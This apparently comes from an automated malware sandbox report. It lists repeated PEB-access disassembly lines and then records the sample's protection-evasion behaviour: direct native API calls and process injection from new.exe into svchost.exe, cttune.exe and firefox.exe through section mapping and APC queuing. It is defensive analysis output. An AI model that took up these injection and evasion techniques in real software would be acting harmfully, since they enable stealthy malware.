                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03460710 mov eax, dword ptr fs:[00000030h]7_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C720 mov eax, dword ptr fs:[00000030h]7_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C720 mov eax, dword ptr fs:[00000030h]7_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346273C mov eax, dword ptr fs:[00000030h]7_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346273C mov ecx, dword ptr fs:[00000030h]7_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346273C mov eax, dword ptr fs:[00000030h]7_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AC730 mov eax, dword ptr fs:[00000030h]7_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343C7C0 mov eax, dword ptr fs:[00000030h]7_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B07C3 mov eax, dword ptr fs:[00000030h]7_2_034B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]7_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]7_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034527ED mov eax, dword ptr fs:[00000030h]7_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE7E1 mov eax, dword ptr fs:[00000030h]7_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034347FB mov eax, dword ptr fs:[00000030h]7_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034347FB mov eax, dword ptr fs:[00000030h]7_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D678E mov eax, dword ptr fs:[00000030h]7_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034307AF mov eax, dword ptr fs:[00000030h]7_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E47A0 mov eax, dword ptr fs:[00000030h]7_2_034E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344C640 mov eax, dword ptr fs:[00000030h]7_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F866E mov eax, dword ptr fs:[00000030h]7_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F866E mov eax, dword ptr fs:[00000030h]7_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A660 mov eax, dword ptr fs:[00000030h]7_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A660 mov eax, dword ptr fs:[00000030h]7_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03462674 mov eax, dword ptr fs:[00000030h]7_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE609 mov eax, dword ptr fs:[00000030h]7_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344260B mov eax, dword ptr fs:[00000030h]7_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472619 mov eax, dword ptr fs:[00000030h]7_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E627 mov eax, dword ptr fs:[00000030h]7_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03466620 mov eax, dword ptr fs:[00000030h]7_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03468620 mov eax, dword ptr fs:[00000030h]7_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343262C mov eax, dword ptr fs:[00000030h]7_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A6C7 mov eax, dword ptr fs:[00000030h]7_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE6F2 mov eax, dword ptr fs:[00000030h]7_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B06F1 mov eax, dword ptr fs:[00000030h]7_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B06F1 mov eax, dword ptr fs:[00000030h]7_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434690 mov eax, dword ptr fs:[00000030h]7_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434690 mov eax, dword ptr fs:[00000030h]7_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C6A6 mov eax, dword ptr fs:[00000030h]7_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034666B0 mov eax, dword ptr fs:[00000030h]7_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438550 mov eax, dword ptr fs:[00000030h]7_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438550 mov eax, dword ptr fs:[00000030h]7_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]7_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]7_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346656A mov eax, dword ptr fs:[00000030h]7_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6500 mov eax, dword ptr fs:[00000030h]7_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504500 mov eax, dword ptr fs:[00000030h]7_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440535 mov eax, dword ptr fs:[00000030h]7_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03432582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03432582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03464588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034EA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0342645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03468402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0342E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0342C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03502B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03428B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0342CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03504B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03450BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03430BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03438BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03440BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03436A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03440A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0345EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03454A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03486ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03430AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03464AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0343EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03504A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03468A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03438AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03486AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03504940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03456962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0347096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0347096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03428918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0343A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03442840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03460854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03434859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_034BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03452835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0346A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\new.exe Code function: 5_2_00C180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\new.exe Code function: 5_2_00BEA124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\new.exe Code function: 5_2_00BEA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtOpenKeyEx: Direct from: 0x77672B9C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtProtectVirtualMemory: Direct from: 0x77672F9C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtCreateFile: Direct from: 0x77672FEC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtOpenFile: Direct from: 0x77672DCC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtTerminateThread: Direct from: 0x77672FCC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtQueryInformationToken: Direct from: 0x77672CAC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtDeviceIoControlFile: Direct from: 0x77672AEC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtQuerySystemInformation: Direct from: 0x776748CC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtQueryAttributesFile: Direct from: 0x77672E6C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtSetInformationThread: Direct from: 0x77672B4C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtOpenSection: Direct from: 0x77672E0C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtAllocateVirtualMemory: Direct from: 0x776748EC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtSetInformationThread: Direct from: 0x776663F9
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtReadVirtualMemory: Direct from: 0x77672E8C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtCreateKey: Direct from: 0x77672C6C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtWriteVirtualMemory: Direct from: 0x7767490C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtDelayExecution: Direct from: 0x77672DDC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtCreateUserProcess: Direct from: 0x7767371C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtQuerySystemInformation: Direct from: 0x77672DFC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtQueryInformationProcess: Direct from: 0x77672C26
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtResumeThread: Direct from: 0x77672FBC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtReadFile: Direct from: 0x77672ADC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtResumeThread: Direct from: 0x776736AC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtSetInformationProcess: Direct from: 0x77672C5C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtMapViewOfSection: Direct from: 0x77672D1C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtNotifyChangeKey: Direct from: 0x77673C2C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtWriteVirtualMemory: Direct from: 0x77672E3C
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe NtCreateMutant: Direct from: 0x776735CC
                Source: C:\Users\user\Desktop\new.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cttune.exe Section loaded: NULL target: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe protection: read write
                Source: C:\Windows\SysWOW64\cttune.exe Section loaded: NULL target: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cttune.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\cttune.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cttune.exe Thread register set: target process: 6972
                Source: C:\Windows\SysWOW64\cttune.exe Thread APC queued: target process: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
